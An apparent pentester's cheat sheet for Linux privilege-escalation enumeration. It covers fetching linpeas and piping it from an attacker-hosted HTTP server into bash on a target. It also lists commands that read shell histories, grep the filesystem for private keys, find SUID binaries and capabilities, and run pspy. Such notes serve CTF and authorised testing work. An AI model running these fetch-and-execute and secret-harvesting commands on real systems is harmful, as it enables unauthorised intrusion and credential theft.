Linpeas#

script to find interesting stuffs on linux, potentially privilege escalation

# Download script
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250301-c97fb02a/linpeas.sh
# Host http
python -m http.server 8080
# execute on remote
curl http://<local-ip>:8080/linpeas | bash

Basic#

id
  • Other non-standard group?
find / -type f -group <group_name>
  • Shell history
history
cat ~/.bash_history
cat ~/.zsh_history
find / -type f \( -name *_hist -o -name *_history \) -ls 2>/dev/null
  • OS version
cat /etc/os-release
uname -r
cat /proc/version
sudo -V
  • List user’s sudo privilege 
sudo -l
  • Installed packages
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list
ls /bin
  • SSH keys
ls -l ~/.ssh
  • All readable keys
grep -rnE '^\-{5}BEGIN [A-Z0-9]+ PRIVATE KEY\-{5}$' /* 2>/dev/null
  • /etc/passwd might contain hash, but very rare
cat /etc/passwd
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
getcap -r / 2>/dev/null
  • Who can use shell (who to target)
grep 'sh$' /etc/passwd | awk -F: '{print $1}'
  • Who can use sudo?
getent group sudo
  • Find all writeable directories
find / -writable -type d 2>/dev/null | grep -v '/home/<user>'
  • Environment variables
env
  • List all temp dir
ls -l /tmp /var/tmp /dev/shm
  • I don’t even know what it does, black magic
find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"
  • Ports
ss -tunl
netstat -tunl

Processes#

Processes run by root#

ps aux | grep root

Running processes#

ps au

pspy#

Github Page

To monitor processes without root.

Download the binary, transfer it to target machine

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

Then just run it

./pspy64 -pf -i 1000

Crontab#

cat /etc/crontab
ls -la /etc/cron.daily/
crontab -l

Disks#

lsblk
cat /etc/fstab

Logged in users#

lastlog

Yea, just w

w
Backward Crontab Kubernetes Forward